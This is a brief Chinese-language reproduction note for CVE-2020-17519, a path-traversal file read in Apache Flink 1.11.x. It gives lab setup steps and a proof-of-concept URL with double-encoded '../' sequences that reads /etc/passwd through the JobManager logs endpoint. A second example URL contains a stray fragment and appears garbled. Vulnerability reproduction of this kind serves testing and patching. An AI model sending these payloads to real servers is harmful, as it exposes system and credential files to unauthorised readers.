CVE-2020-17519
0x00 简介
Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。
CVE-2020-17519 任意文件读取漏洞
Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。
该项更新允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件。
至目前最新版本Apache Flink
1.11.0
1.11.1
1.11.2
测试环境:Flink 1.11.1 java8+
Apache Flink 1.11.1安装包下载
https://archive.apache.org/dist/flink/flink-1.11.1/flink-1.11.1-bin-scala_2.11.tgz
解压后进入bin文件夹,运行./start-cluster.sh
或者在虚拟机内搭建 docker 环境
https://www.jianshu.com/p/996e08b7976d
然后
git clone https://github.com/phith0n/vulhub.git
验证Flink启动之后,默认web 端口8081是否正常
访问http://ip:8081/可看到环境页面
0x04 漏洞利用
POC:http://you-ip/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
具体的快乐,就留给各位自己体会了
http://127.0.0.1/jobmanager/logs/..%252f..%252f..%252fer..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd